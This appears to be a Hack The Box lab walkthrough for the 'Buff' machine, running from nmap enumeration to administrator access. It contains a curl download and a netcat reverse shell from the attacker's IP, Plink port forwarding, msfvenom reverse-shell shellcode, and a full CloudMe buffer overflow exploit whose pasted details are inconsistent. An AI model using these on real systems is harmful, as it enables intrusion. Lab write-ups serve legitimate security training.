NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-22 09:37 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:37
Completed NSE at 09:37, 0.00s elapsed
Initiating NSE at 09:37
Completed NSE at 09:37, 0.00s elapsed
Initiating NSE at 09:37
Completed NSE at 09:37, 0.00s elapsed
Initiating Ping Scan at 09:37
Scanning 10.10.10.198 [4 ports]
Completed Ping Scan at 09:37, 0.90s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:37
Scanning buff.htb (10.10.10.198) [1000 ports]
Discovered open port 8080/tcp on 10.10.10.198
Completed SYN Stealth Scan at 09:38, 45.74s elapsed (1000 total ports)
Initiating Service scan at 09:38
Scanning 1 service on buff.htb (10.10.10.198)
Completed Service scan at 09:38, 9.32s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against buff.htb (10.10.10.198)
Retrying OS detection (try #2) against buff.htb (10.10.10.198)
Initiating Traceroute at 09:38
Completed Traceroute at 09:38, 0.41s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 09:38
Completed Parallel DNS resolution of 2 hosts. at 09:38, 0.29s elapsed
NSE: Script scanning 10.10.10.198.
Initiating NSE at 09:38
Completed NSE at 09:39, 34.64s elapsed
Initiating NSE at 09:39
Completed NSE at 09:39, 12.42s elapsed
Initiating NSE at 09:39
Completed NSE at 09:39, 0.00s elapsed
Nmap scan report for buff.htb (10.10.10.198)
Host is up (0.48s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Randomized
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 399.14 ms 10.10.14.1
2 413.69 ms buff.htb (10.10.10.198)
NSE: Script Post-scanning.
Initiating NSE at 09:39
Completed NSE at 09:39, 0.00s elapsed
Initiating NSE at 09:39
Completed NSE at 09:39, 0.00s elapsed
Initiating NSE at 09:39
Completed NSE at 09:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.38 seconds
Raw packets sent: 2106 (96.348KB) | Rcvd: 225 (19.761KB)
PORT 8080 ENUMERATION
Here we have nothing as much but we just have upload option in admin page so Lets google for its exploit if available!!
https://www.exploit-db.com/exploits/48506
Here we go with our exploit!!
GETTING USER ACCESS
┌─[✗]─[root@liquid]─[~/Desktop/HTB/buff]
└──╼ #python web.py http://buff.htb:8080/
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> curl http://10.10.14.135/nc.exe -o nc.exe
�PNG
�
C:\xampp\htdocs\gym\upload> .\nc.exe 10.10.14.135 9008 -e powershell.exe
┌─[✗]─[root@liquid]─[~/Desktop/HTB/buff] └──╼ #rlwrap nc -lnvp 9008 listening on [any] 9008 ... connect to [10.10.14.135] from (UNKNOWN) [10.10.10.198] 50045 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\xampp\htdocs\gym\upload> whoami whoami buff\shaun PS C:\xampp\htdocs\gym\upload> cd c:\users\shaun\desktop cd c:\users\shaun\desktop PS C:\users\shaun\desktop> type user.txt type user.txt 7ddf32e17a6ac5ce04a8ecbf782ca509 PS C:\users\shaun\desktop>
GETTING ROOT ACCESS
Here we have Port 8888 which is being used for cloudme which we can exploit but here we see that we cannot run python exploit in windows machine. But what if we port forward it our machine.
Exploit : https://www.exploit-db.com/exploits/48389
Steps Involved Here :
- download Plink.exe : https://www.softpedia.com/get/Network-Tools/Telnet-SSH-Clients/Tatham-Plink.shtml
2. Upload it to Buff’s Machine
3. Open up the SSH service on your machine : service ssh start
4. Then just run the following command :
.\Plink.exe -v -x -a -noagent -ssh -pw $PASSWORD -R 8888:127.0.0.1:8888 $USERNAME@$IP
The OutPut Will Open up Your terminal as Shown below:
PS C:\users\shaun\downloads> .\Plink.exe -v -x -a -noagent -ssh -pw liquid -R 8888:127.0.0.1:8888 age@10.10.14.135 .\Plink.exe -v -x -a -noagent -ssh -pw liquid -R 8888:127.0.0.1:8888 age@10.10.14.135 Looking up host "10.10.14.135" for SSH connection Connecting to 10.10.14.135 port 22 We claim version: SSH-2.0-PuTTY_Release_0.74 Remote version: SSH-2.0-OpenSSH_8.3p1 Debian-1 Using SSH protocol version 2 Doing ECDH key exchange with curve Curve25519 and hash SHA-256 (SHA-NI accelerated) Server also has ecdsa-sha2-nistp256/ssh-rsa host keys, but we don't know any of them Host key fingerprint is: ssh-ed25519 255 32:90:52:02:e3:0d:b7:79:f4:73:03:9e:e1:cb:e8:ed The server's host key is not cached in the registry. You have no guarantee that the server is the computer you think it is. The server's ssh-ed25519 key fingerprint is: ssh-ed25519 255 32:90:52:02:e3:0d:b7:79:f4:73:03:9e:e1:cb:e8:ed If you trust this host, enter "y" to add the key to PuTTY's cache and carry on connecting. If you want to carry on connecting just once, without adding the key to the cache, enter "n". If you do not trust this host, press Return to abandon the connection. Store key in cache? (y/n) n Initialised AES-256 SDCTR (AES-NI accelerated) outbound encryption Initialised HMAC-SHA-256 (SHA-NI accelerated) outbound MAC algorithm Initialised AES-256 SDCTR (AES-NI accelerated) inbound encryption Initialised HMAC-SHA-256 (SHA-NI accelerated) inbound MAC algorithm Using username "age". Sent password Access granted Requesting remote port 8888 forward to 127.0.0.1:8888 Opening main session channel Remote port forwarding from 8888 enabled Opened main channel Allocated pty Started a shell/command Linux liquid 5.6.0-kali1-amd64 #1 SMP Debian 5.6.7-1kali1 (2020-05-12) x86_64 The programs included with the Kali GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. age@liquid:~$
Now Lets check ports on our machine and we will see that Port 8888 is forwarded:
age@liquid:~$ netstat -ltn netstat -ltn Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:902 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:50505 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:3790 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:8888 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:3001 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN tcp6 0 0 :::902 :::* LISTEN tcp6 0 0 ::1:7337 :::* LISTEN tcp6 0 0 ::1:8307 :::* LISTEN tcp6 0 0 :::22 :::* LISTEN tcp6 0 0 ::1:8888 :::* LISTEN tcp6 0 0 :::443 :::* LISTEN age@liquid:~$
Now we will be modifying our exploit by generating our reverse shell code and replacing it with actual code
┌─[✗]─[root@liquid]─[~/Desktop/HTB/buff] └──╼ #msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.135 LPORT=9003 -f c [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 324 bytes Final size of c file: 1386 bytes unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" "\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68" "\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0a\x0e\x87\x68" "\x02\x00\x23\x2b\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61" "\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2" "\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6" "\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44" "\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56" "\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff" "\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6" "\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
Replace this code with actuall code and run the exploit and remember to listen on port we mentioned in above exploit
WHOLE CODE WILL LOOK LIKE THIS:
┌─[root@liquid]─[~/Desktop/HTB/buff] └──╼ #cat exploit2.py # Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC) # Date: 2020-04-27 # Exploit Author: Andy Bowden # Vendor Homepage: https://www.cloudme.com/en # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe # Version: CloudMe 1.11.2 # Tested on: Windows 10 x86 #Instructions: # Start the CloudMe service and run the script. import socket target = "127.0.0.1" padding1 = b"\x90" * 1052 EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET NOPS = b"\x90" * 30 #msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33" payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc" payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f" payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8" payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f" payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43" payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee" payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4" payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a" payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff" payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33" payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59" payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05" payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4" payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6" payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c" payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f" overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload)) buf = padding1 + EIP + NOPS + payload + overrun try: s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target,9005)) s.send(buf) except Exception as e: print(sys.exc_value)
RUN THE EXPLOIT :
┌─[root@liquid]─[~/Desktop/HTB/buff] └──╼ #python exploit1.py
ON NETCAT LISTENER :
age@liquid:/root/Desktop/HTB/buff$ nc -lnvp 9003 listening on [any] 9003 ... connect to [10.10.14.135] from (UNKNOWN) [10.10.10.198] 49778 Microsoft Windows [Version 10.0.17134.1550] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>cd c:\users\administrator\desktop cd c:\users\administrator\desktop c:\Users\Administrator\Desktop>type root.txt type root.txt 3dc4c38834d57057973b16256cc750d6
Here we go with our admin access
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
